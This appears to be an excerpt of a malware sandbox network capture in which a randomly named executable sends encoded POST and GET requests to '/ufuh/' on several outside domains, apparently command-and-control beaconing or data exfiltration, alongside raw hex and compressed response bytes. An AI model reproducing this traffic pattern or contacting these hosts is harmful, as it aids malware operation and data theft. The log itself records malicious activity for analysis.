Jun 3, 2024 08:53:10.750077963 CEST	208	IN	HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.22	49173	91.195.240.19	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:12.429841995 CEST	731	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 201 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.primeplay88.org Origin: http://www.primeplay88.org Referer: http://www.primeplay88.org/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 6a 44 58 71 4f 62 6b 69 45 6a 42 59 51 78 2f 70 47 4c 45 46 53 78 6f 69 36 38 37 5a 2f 54 6b 45 6d 54 57 6e 59 57 4d 55 4f 66 31 67 50 4b 69 4d 74 48 76 4f 62 57 71 65 49 76 70 6a 72 31 59 74 41 43 69 34 58 51 38 67 47 63 62 57 47 35 71 32 50 4c 77 78 6d 6c 31 64 61 48 62 77 31 52 59 65 30 2b 31 68 4f 76 37 47 54 53 6a 76 52 45 64 4c 48 37 7a 47 74 32 59 42 38 72 35 34 4d 4c 54 64 69 4e 44 4a 30 52 68 7a 44 6d 7a 49 2b 42 7a 39 6a 71 43 2b 4b 77 45 45 55 77 7a 4e 65 35 47 6f 43 45 2b 30 51 47 55 46 4e 63 75 76 32 70 78 58 7a 7a 6f 34 7a 77 70 7a 6b 34 34 55 70 46 7a 39 4e 41 3d 3d Data Ascii: ZXdp=jDXqObkiEjBYQx/pGLEFSxoi687Z/TkEmTWnYWMUOf1gPKiMtHvObWqeIvpjr1YtACi4XQ8gGcbWG5q2PLwxml1daHbw1RYe0+1hOv7GTSjvREdLH7zGt2YB8r54MLTdiNDJ0RhzDmzI+Bz9jqC+KwEEUwzNe5GoCE+0QGUFNcuv2pxXzzo4zwpzk44UpFz9NA==
Jun 3, 2024 08:53:13.273058891 CEST	208	IN	HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.22	49174	91.195.240.19	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:14.948903084 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 3625 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.primeplay88.org Origin: http://www.primeplay88.org Referer: http://www.primeplay88.org/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 6a 44 58 71 4f 62 6b 69 45 6a 42 59 52 56 37 70 45 6f 73 46 58 52 6f 6c 30 63 37 5a 78 7a 6b 66 6d 54 4b 6e 59 53 55 45 50 73 5a 67 4f 64 6d 4d 74 6c 33 4f 4c 6d 71 65 4b 76 70 76 30 6c 5a 6f 41 43 32 53 58 51 4d 61 47 65 33 57 47 59 36 32 4e 4e 4d 77 74 31 31 54 65 48 62 33 31 52 59 78 30 2b 6c 6c 4f 76 75 52 54 54 48 76 57 32 46 4c 50 72 7a 42 6f 32 59 42 38 72 35 43 4d 4c 54 39 69 4e 62 52 30 51 34 30 44 78 4c 49 37 52 54 39 69 4a 71 39 4d 77 45 41 61 51 79 39 61 36 6a 32 49 53 6a 39 63 55 45 38 54 4f 57 70 30 65 4e 6c 72 56 6f 78 6c 41 52 48 6d 50 56 77 67 6c 43 79 65 70 54 6b 75 6b 56 45 52 47 43 56 31 54 2f 37 48 61 4e 56 4c 57 44 41 4f 6f 75 6d 37 4e 6e 33 43 71 6c 65 61 6b 79 72 53 54 69 53 2f 38 79 77 6a 77 32 76 34 62 31 4e 71 52 47 72 46 54 5a 6f 73 65 62 79 78 38 50 74 4f 43 61 2f 4a 74 54 68 74 4f 66 78 4a 74 64 6a 6e 6a 73 36 79 47 4d 4e 77 73 6d 65 77 42 68 51 7a 30 51 51 41 6d 64 63 77 38 76 68 4f 68 6b 63 31 4b 7a 6c 37 37 52 73 42 6a 36 45 48 32 31 41 79 57 67 41 36 [TRUNCATED] Data Ascii: ZXdp=jDXqObkiEjBYRV7pEosFXRol0c7ZxzkfmTKnYSUEPsZgOdmMtl3OLmqeKvpv0lZoAC2SXQMaGe3WGY62NNMwt11TeHb31RYx0+llOvuRTTHvW2FLPrzBo2YB8r5CMLT9iNbR0Q40DxLI7RT9iJq9MwEAaQy9a6j2ISj9cUE8TOWp0eNlrVoxlARHmPVwglCyepTkukVERGCV1T/7HaNVLWDAOoum7Nn3CqleakyrSTiS/8ywjw2v4b1NqRGrFTZosebyx8PtOCa/JtThtOfxJtdjnjs6yGMNwsmewBhQz0QQAmdcw8vhOhkc1Kzl77RsBj6EH21AyWgA6vYoJu50P5/kfBCzQ+0Clo+1dOqQBOdd04lx1lmsV48IcrfrXl84tSb0U/odDQ/fNCNwTlcZz3uP3MuDz7ldo+i9Wcf4vuDawGhlLOybjsOKtlbj0jvZZEMy31hGJiQ4tAtf70meymUkBMIK6RT1YbjKZIoA1vrgb8uhVkMLmDmUIiXe0B4dY9rSymxVU5M7T24rFBwoetbBMLEQrxz8XEEORcIMrDVJVHsp8vnHF0S5QkWn9rS6hyYtBowlpuHRJRIB8/2wAXDS5kPUxSS1GPgMnUlKauNerih/1+ZWcKpwa4GaJmQX9TdulT38zy/BYSzLeN02tjZ0MUtykKaKC5jgVvV3/TjKqUgML2A5QkVmbnbuiatp4D3SQi2LTf7DVDh+wgCtomAkDWUBYaao3SKNDgDthhvPchHBbjBTUkU1fBGPH7nHXknWfvqkyAgcmFodOCOv+1nTqs0fWqiRzICevRWI95LweZDfMcS95FqzXsvoh5AaBTLMoU6XO09zEqI1nVLJHslLnBxn8rlu8h6cSF75pyHmJomF/mb9iU7sJT62xEKSDqanVyvqZ1D4kOOPiCqe74tdkJkp2LXG7L2kWZt2YS3h9zwEvpmF2RA8jI3ErA1VHFr6JAx8AQWjTYrj67uOtt1QpndDJ7nhm4yUe7iQXsEJ4Av [TRUNCATED]
Jun 3, 2024 08:53:14.953831911 CEST	1684	OUT	Data Raw: 43 2b 42 4f 44 35 58 69 6d 53 7a 44 2b 78 55 47 46 36 50 42 58 35 2b 31 5a 52 55 34 65 76 6f 78 73 36 52 2f 48 75 49 52 35 4b 7a 73 31 71 43 36 64 70 58 73 61 69 4a 51 75 7a 30 69 62 6c 6d 45 51 78 4a 34 58 54 5a 58 64 50 62 77 42 7a 63 71 48 30 Data Ascii: C+BOD5XimSzD+xUGF6PBX5+1ZRU4evoxs6R/HuIR5Kzs1qC6dpXsaiJQuz0iblmEQxJ4XTZXdPbwBzcqH0RI8nkRhZdRMdqunHdew9qP+RXTsCY9wEWP7YO1PAPmdlLZTXjxkc4q0dYS5gdLn7ufRY+jSOvtPirAcvLZp7h/HBBVLkRxLnUAPsrKUEDHxq5fLGUo1vZwv0wgJnN7odEuhc8h3Oo1SwFQg28tvVdVcaHMFrjzV1j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.22	49175	91.195.240.19	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:17.476157904 CEST	464	OUT	GET /ufuh/?ZXdp=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&7jsp7=zz9xHbtX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.primeplay88.org User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jun 3, 2024 08:53:18.323774099 CEST	208	IN	HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.22	49176	198.12.241.35	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:23.506927013 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 2161 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.aceautocorp.com Origin: http://www.aceautocorp.com Referer: http://www.aceautocorp.com/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 6d 43 38 6c 66 71 4d 48 33 4b 39 4f 68 76 33 61 36 74 2f 57 76 35 74 71 47 64 46 76 61 35 50 43 4e 45 69 66 78 74 79 41 6f 30 50 36 78 6f 43 72 67 2b 44 4f 6d 6b 74 4d 50 66 58 67 63 61 5a 5a 6c 4f 52 79 4f 35 31 4d 76 65 39 32 2b 34 35 57 37 6f 6e 4a 6b 67 75 51 48 6f 44 5a 64 51 6e 79 47 4a 68 34 57 56 63 63 76 50 4f 73 30 31 49 68 61 37 43 6e 5a 53 4a 39 5a 56 5a 69 65 6d 46 30 70 63 6b 68 43 43 39 43 41 70 58 63 72 73 46 47 4b 59 2b 79 72 50 47 4d 61 51 61 43 4e 4e 31 42 6a 4d 72 2b 62 6c 31 4b 31 38 36 6c 59 2f 4f 45 62 2b 64 55 66 42 37 46 2f 4f 75 66 53 4b 54 6f 4b 6f 56 47 46 32 54 63 59 55 4b 43 38 2b 6f 76 53 6d 47 70 38 32 4f 31 55 6f 2b 63 4f 42 54 39 6e 45 46 69 64 52 50 69 35 46 37 51 6c 31 79 38 49 73 61 6a 65 48 7a 61 2f 35 58 48 39 36 48 77 65 70 65 30 4c 39 57 35 65 2f 64 54 31 7a 48 36 5a 5a 4f 48 31 48 2f 45 65 5a 7a 6b 45 70 47 6b 62 35 78 35 56 79 7a 4e 56 47 67 37 72 47 30 32 63 35 76 38 43 36 39 52 43 6b 37 57 52 77 71 56 77 77 42 45 39 75 2f 51 61 2b 55 65 44 [TRUNCATED] Data Ascii: ZXdp=mC8lfqMH3K9Ohv3a6t/Wv5tqGdFva5PCNEifxtyAo0P6xoCrg+DOmktMPfXgcaZZlORyO51Mve92+45W7onJkguQHoDZdQnyGJh4WVccvPOs01Iha7CnZSJ9ZVZiemF0pckhCC9CApXcrsFGKY+yrPGMaQaCNN1BjMr+bl1K186lY/OEb+dUfB7F/OufSKToKoVGF2TcYUKC8+ovSmGp82O1Uo+cOBT9nEFidRPi5F7Ql1y8IsajeHza/5XH96Hwepe0L9W5e/dT1zH6ZZOH1H/EeZzkEpGkb5x5VyzNVGg7rG02c5v8C69RCk7WRwqVwwBE9u/Qa+UeDlrB3UEnvBmTAGcdR7IdoTHMvvJy+fzdR7U7Pm08uxlXYVbSUIFidczDQLTLu3dsB0lBubzz9/EHluNWXv8spFIK1r0ed0j5MODYqK30yn5BcplTkeSmAVxuWUlfpXcnZaG1OCQZn1ZzQN8MRQ1fGgc0LmqybdS21XZ3jGHIOFKrEc/uSSyIAbPwKJBMA/SxhDuBH9yh5Pn7SFov9k8r2IXfrsP6WMNWC9UqrZRxNaHLPJVdLrMyEtxC3BIvsSO3UhbmxEfW7SSccNqDUEEFaySK35TjFktSBGC7dD31bIQ4UWvlRF3Nu+UIK8zBu7EvEKVAoFzFf6J+yuGM+mlWr7//2SWKdMwN8fZwVly79kb6kkjh2AQ7KWasEz+0JF+jF/AQpN+ADUVDELX3DEw8pNARu5A4mzAQRVXFhJl+OQlRimJVHYQYq9GG5B72KZOT4D0gSnEdDY5M7kFJp0h/YLX9pa3x0it/n+66ryHLTNXGfZ1slN93zRJlwSfwA4qZ1fnfmkmi+A+bi/Y5R/2apLe8i4VxUKlMurKrf2cvhWZZZBwRRhH2Gs4Da1IffmvHXnxzYogWjvjA59PcaOrtbcoPF17KAKDh7sUye34tTv2Au9f+MFARvGiFHslJxItk8wHmFGEjJ1U3hIRPdDZJECYeDBi+PtO0gsf [TRUNCATED]
Jun 3, 2024 08:53:23.512070894 CEST	220	OUT	Data Raw: 58 38 6a 67 4b 6b 78 4f 47 55 76 75 78 71 51 5a 58 42 43 38 2b 69 77 70 5a 76 2f 35 67 78 32 71 58 39 4a 7a 51 48 33 66 58 6e 47 64 44 6b 6a 61 6e 66 39 72 36 58 32 78 78 6b 4e 6a 55 4d 54 65 68 45 7a 6f 31 44 47 32 2b 69 59 67 6a 44 73 33 6b 46 Data Ascii: X8jgKkxOGUvuxqQZXBC8+iwpZv/5gx2qX9JzQH3fXnGdDkjanf9r6X2xxkNjUMTehEzo1DG2+iYgjDs3kFve9C6VwCxzCW8X2BvlQ/jYzxSTfSgVAAgA/33LmyUzqjA08hWdf8uxzH2l7GklHyzPkHAcMin9wHGJbQyh9JPtZzL0XvF5y5m+8KEscB0Gyy/T8ICYmbAAEYnYbGUicBRA58bOHnCk
Jun 3, 2024 08:53:24.245861053 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 03 Jun 2024 06:53:24 GMT Server: Apache X-Powered-By: PHP/8.1.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: br Content-Length: 9730 Content-Type: text/html; charset=UTF-8 Data Raw: 13 53 cb 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 9f a9 da 9f a5 cb e9 19 9e 48 84 03 40 00 58 5a a8 14 67 8b 7f 69 4e 7e b3 3d 1e 88 04 25 6e 28 82 03 40 c5 cb e5 5f b6 ea f3 bc a5 63 32 81 24 59 32 81 97 2c 39 06 a2 b9 7a 90 79 aa ea 9e 8e a8 9e d9 d1 70 a8 17 4e 31 24 c5 e2 1d 67 be 84 aa ae ae ee e1 fb fb 91 c1 33 84 e8 38 72 ec 19 61 0b d8 70 64 b8 64 58 86 6c 3d 86 6a b2 fd b4 fb 06 11 51 14 51 93 76 db 70 79 99 58 f7 de 86 10 ac 25 02 13 93 a1 9a c9 d8 e4 97 03 27 30 58 c8 54 32 df 5a 8c b9 bd 10 f9 21 22 92 70 57 3d 45 37 cf 39 e5 74 4c 81 19 a8 3e 4a c0 e0 76 c9 35 60 d2 59 2b a4 87 09 0e f6 69 16 b9 6c 1f ae 50 b2 ab bd c4 70 95 53 0a 88 16 3a 07 45 5b 15 ee 10 81 d8 52 ea 36 2b 81 cb 7c 4a d7 a9 3f ec d6 2f 07 d6 47 75 3d 07 c6 20 1d 63 99 16 f1 4c d7 9e 29 be c0 be 19 18 8c 07 76 25 90 77 ef 5d 88 12 3e d7 1a 3e 9f bc 81 d4 31 ce 7a f6 48 cb 0f 7d 37 fc 00 ab fb 6a dd 0c 0e f3 35 68 b5 af 0f eb 13 37 5c 6c b3 51 b5 be df 84 4d 3b 4e f0 a0 d0 b4 c7 0a 88 a3 69 9d 91 4b 37 9c 15 e8 a8 83 [TRUNCATED] Data Ascii: SC@E`:H@XZgiN~=%n(@_c2$Y2,9zypN1$g38rapddXl=jQQvpyX%'0XT2Z!"pW=E79tL>Jv5`Y+ilPpS:E[R6+\|J?/Gu= cL)v%w]>>1zH}7j5h7\lQM;NiK7p^ucBN6_m},5Ce{fQoPnz]y8v3<&{iy<oD87yW$7D;qe;z;lhBjr$c:ysDuuVQ=Ya1<)pP:D?^7pYtd(1]0m&1oyWhR7(+?KU{^C+"c<y'YQkpf1N\|fmpW>nlz4k_\+)weabmC_t'Ljk_1xbZ9!TxT=,OMV$9oO2Qk5wVlv"ju}OFE:I
Jun 3, 2024 08:53:24.245893002 CEST	1236	IN	Data Raw: ff fe ae f2 bb c6 15 b4 9f b2 34 36 8d 88 04 d3 83 e4 ba 7d b9 fd b8 4b 8d 6b 26 6d 11 2e 93 81 0b 07 ba 98 b1 dd d2 4c d5 32 49 81 73 db 89 1d da fd 86 dd 10 9e b1 14 44 ca bf b1 05 c1 18 b3 15 9a ef 07 5a 56 ab 41 37 55 11 ff a5 a6 85 ff 18 fb Data Ascii: 46}Kk&m.L2IsDZVA7UC[-zRpWjc{V}fMeSj(70QD/_x"V2/U#+n`tB(E$C(+\|fiZcRuzIT>PDbCH{gXzl]
Jun 3, 2024 08:53:24.245913029 CEST	424	IN	Data Raw: a6 e9 d1 fc 4e 09 48 a9 91 16 4d ba 79 e1 14 a5 86 ac d9 d2 85 4c db 63 05 70 d3 54 cc 0b ca a1 7b 43 51 ef 54 7c 9d 4f eb 7b 40 8e 18 dc 1b 05 6b 5f 0a 1f ee bd 81 47 8d 7f 70 54 56 9d d9 53 78 45 32 a0 47 04 43 b6 0e db d3 64 59 85 0c 30 6c cb Data Ascii: NHMyLcpT{CQT\|O{@k_GpTVSxE2GCdY0l_-5%cB_^hb0>(M\{m`G1HVW.$+:c\b&8/J0\|;W4z1cZ[:x.Ge0f,RLt9 <
Jun 3, 2024 08:53:24.245930910 CEST	1236	IN	Data Raw: e8 1a 2b 96 ce 28 51 8e 88 66 79 f4 9d 48 bc da bd 35 97 42 88 dd 52 5e 96 96 45 9e 28 a8 9c 28 1e 41 4f 2d b2 dc e8 7e bd ca e2 34 38 ed 0f 73 26 c7 c1 2b 3d b0 e2 aa 04 10 e9 44 ee 55 b8 83 ed 86 1f 24 ea 0f 7f c6 e6 10 ea 67 9e d6 f1 4e d1 8e Data Ascii: +(QfyH5BR^E((AO-~48s&+=DU$gN1TG[26]l=f;^qR2^,MyYym)dPsJ3?fdI,1!P]3\h2keeqd7/2bFg%\u(dS;s-w6G$J
Jun 3, 2024 08:53:24.245949030 CEST	1236	IN	Data Raw: ef 77 34 04 ce f9 56 6b 8d 05 d2 2b ce 96 85 e2 bb 37 25 e4 3b 3c 4c 1b dc 85 7d a6 3b 77 0d 9d fd b3 67 3d ea 4d 0d d4 1b 77 74 81 b9 46 80 ab d9 74 fc d7 e4 9a 94 27 85 e8 0d 2b 0b f9 67 16 88 30 6e f4 9e dc 72 de f0 2c 22 b7 3c c9 43 1d e2 90 Data Ascii: w4Vk+7%;<L};wg=MwtFt'+g0nr,"<COv5GGHKgR;;rviup;KNuZj]mkkNJwg[Ij:ratJGWUE>0y=x!A<Y5"VZrtr6.Y,
Jun 3, 2024 08:53:24.245966911 CEST	1236	IN	Data Raw: 91 35 4e f5 ab 3c 8e da ae 86 35 38 c7 c1 5b b8 3c 6b 46 84 6c 0a 4d 11 16 f8 da 84 ac 4a 4a 31 13 10 cf 71 24 24 42 e6 71 dc 7e 11 27 42 24 44 c6 25 a8 1f 75 10 91 4c 78 03 e6 18 75 30 83 38 5a 70 fb 73 7e 1d 85 f8 2e c8 9f e6 f7 f2 73 9e f3 5d Data Ascii: 5N<58[<kFlMJJ1q$$Bq~'B$D%uLxu08Zps~.s].D?s+]HOkF[Lv=}a/KP4nHI)`<FF=P8<xA ~Olp&)K2^/Hv?}T0kE&SdJ
Jun 3, 2024 08:53:24.246081114 CEST	1236	IN	Data Raw: 5b 06 a9 30 d9 64 fe 9f e1 7c 10 04 0e 92 c0 21 24 70 88 08 1c 62 02 87 64 aa 50 dc 53 d8 1d ae 10 89 4c 5c 4f a6 9a a7 3a 45 4b 31 d4 0d 48 c4 e5 7c 90 67 e5 ce 98 f9 10 46 d4 97 ef 16 a9 be df ba 38 75 29 fa 95 e9 71 81 ce 87 78 5a e3 ce 98 f9 Data Ascii: [0d\|!$pbdPSL\O:EK1H\|gF8u)qxZpi)Q$47}%72##1`.P\|xzf,dc-m-fj5(FZBD/3J\\|-B9Z~GGy#;UU,VpLD3U$U5v1hCVps
Jun 3, 2024 08:53:24.246097088 CEST	848	IN	Data Raw: 27 4f 60 64 d1 34 e4 42 d5 79 9a d2 11 1e 06 5f 5f 79 61 c5 2b ef 4c 11 48 3c 8b 0b 30 8f 49 07 c1 8d aa ec a7 22 46 9d 4f e8 92 3a a5 e5 8c 4f 63 d2 78 dd c7 70 c5 11 77 af ed c0 3b d6 4a 63 3e 28 2b cc 91 68 26 30 bc cf 32 ab c2 a5 48 b3 53 70 Data Ascii: 'O`d4By__ya+LH<0I"FO:Ocxpw;Jc>(+h&02HSpX5.)-GN?JO][<{\@A{gG{D?E32?=x<l#Ts)B*]A:K%j4}Zp]]3\|-+9>`m8
Jun 3, 2024 08:53:24.246176004 CEST	1236	IN	Data Raw: 1b dd 32 fa ef e1 89 5b bb 5e ff 6c f0 21 ae 1f 3c b9 b4 68 7c c1 c5 b4 ad 5c 63 68 09 3b a0 7c b0 0e 53 a6 e0 66 4d 7d 56 9a ad a7 b1 9a 03 6e ff 6e 44 96 27 b5 46 f4 57 ed 55 99 f3 f6 1a 71 6e 6d 24 cb b8 89 6b 83 df 92 32 eb e1 d6 b5 bc fe ce Data Ascii: 2[^l!<h\|\ch;\|SfM}VnnD'FWUqnm$k27;Ey1-].i"]_x8`=i3`O!E[2MeX(RQYzk].fpYV~grj*vX.jdft4Wkm
Jun 3, 2024 08:53:24.246189117 CEST	223	IN	Data Raw: 86 4f 13 b3 a6 85 ce bf 7e 78 b3 c4 db 9b 4c 25 cc a4 7c 1a d6 80 69 00 65 61 44 4b 5c e1 ce 02 17 e5 d2 02 b1 d0 e7 72 7d f0 2e 6c 50 96 68 7a 91 b5 83 87 af 6d 69 ae 12 b8 68 81 19 34 00 66 c3 91 03 c9 d1 b8 0a 45 8a 7c 5c 0e 2a ca 9f 27 d6 35 Data Ascii: O~xL%\|ieaDK\r}.lPhzmih4fE\|\'5%W>\|V_c:CSf]S[:m=B{&b/48N5Mk8eM`mgu@opl'X&J`9TcHR22VB/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.22	49177	198.12.241.35	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:26.031152964 CEST	731	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 201 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.aceautocorp.com Origin: http://www.aceautocorp.com Referer: http://www.aceautocorp.com/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 6d 43 38 6c 66 71 4d 48 33 4b 39 4f 68 73 66 61 34 2f 48 57 75 5a 74 71 46 64 46 76 42 4a 50 45 4e 45 75 74 78 76 66 46 70 44 72 36 32 38 4f 72 68 4d 72 4f 68 6b 74 4c 62 50 58 6b 52 36 5a 41 6c 4f 52 41 4f 35 35 4d 76 65 35 32 73 75 39 57 39 74 4c 4f 6d 51 75 53 54 59 44 59 64 51 36 4f 47 4a 74 6f 57 55 6b 63 76 4d 61 73 79 45 34 68 50 76 69 6e 66 69 4a 33 51 31 5a 78 65 6d 4a 68 70 63 56 74 43 43 52 43 41 59 4c 63 72 39 6c 47 49 35 2b 79 77 66 47 4e 58 77 62 30 47 34 45 2f 6d 50 58 68 48 45 42 32 32 2f 57 2b 46 6f 61 4a 52 73 46 6c 63 54 66 59 36 49 62 63 45 36 4f 63 4a 51 3d 3d Data Ascii: ZXdp=mC8lfqMH3K9Ohsfa4/HWuZtqFdFvBJPENEutxvfFpDr628OrhMrOhktLbPXkR6ZAlORAO55Mve52su9W9tLOmQuSTYDYdQ6OGJtoWUkcvMasyE4hPvinfiJ3Q1ZxemJhpcVtCCRCAYLcr9lGI5+ywfGNXwb0G4E/mPXhHEB22/W+FoaJRsFlcTfY6IbcE6OcJQ==
Jun 3, 2024 08:53:26.777951956 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 03 Jun 2024 06:53:26 GMT Server: Apache X-Powered-By: PHP/8.1.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: br Content-Length: 9730 Content-Type: text/html; charset=UTF-8 Data Raw: 13 53 cb 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 9f a9 da 9f a5 cb e9 19 9e 48 84 03 40 00 58 5a a8 14 67 8b 7f 69 4e 7e b3 3d 1e 88 04 25 6e 28 82 03 40 c5 cb e5 5f b6 ea f3 bc a5 63 32 81 24 59 32 81 97 2c 39 06 a2 b9 7a 90 79 aa ea 9e 8e a8 9e d9 d1 70 a8 17 4e 31 24 c5 e2 1d 67 be 84 aa ae ae ee e1 fb fb 91 c1 33 84 e8 38 72 ec 19 61 0b d8 70 64 b8 64 58 86 6c 3d 86 6a b2 fd b4 fb 06 11 51 14 51 93 76 db 70 79 99 58 f7 de 86 10 ac 25 02 13 93 a1 9a c9 d8 e4 97 03 27 30 58 c8 54 32 df 5a 8c b9 bd 10 f9 21 22 92 70 57 3d 45 37 cf 39 e5 74 4c 81 19 a8 3e 4a c0 e0 76 c9 35 60 d2 59 2b a4 87 09 0e f6 69 16 b9 6c 1f ae 50 b2 ab bd c4 70 95 53 0a 88 16 3a 07 45 5b 15 ee 10 81 d8 52 ea 36 2b 81 cb 7c 4a d7 a9 3f ec d6 2f 07 d6 47 75 3d 07 c6 20 1d 63 99 16 f1 4c d7 9e 29 be c0 be 19 18 8c 07 76 25 90 77 ef 5d 88 12 3e d7 1a 3e 9f bc 81 d4 31 ce 7a f6 48 cb 0f 7d 37 fc 00 ab fb 6a dd 0c 0e f3 35 68 b5 af 0f eb 13 37 5c 6c b3 51 b5 be df 84 4d 3b 4e f0 a0 d0 b4 c7 0a 88 a3 69 9d 91 4b 37 9c 15 e8 a8 83 [TRUNCATED] Data Ascii: SC@E`:H@XZgiN~=%n(@_c2$Y2,9zypN1$g38rapddXl=jQQvpyX%'0XT2Z!"pW=E79tL>Jv5`Y+ilPpS:E[R6+\|J?/Gu= cL)v%w]>>1zH}7j5h7\lQM;NiK7p^ucBN6_m},5Ce{fQoPnz]y8v3<&{iy<oD87yW$7D;qe;z;lhBjr$c:ysDuuVQ=Ya1<)pP:D?^7pYtd(1]0m&1oyWhR7(+?KU{^C+"c<y'YQkpf1N\|fmpW>nlz4k_\+)weabmC_t'Ljk_1xbZ9!TxT=,OMV$9oO2Qk5wVlv"ju}OFE:I
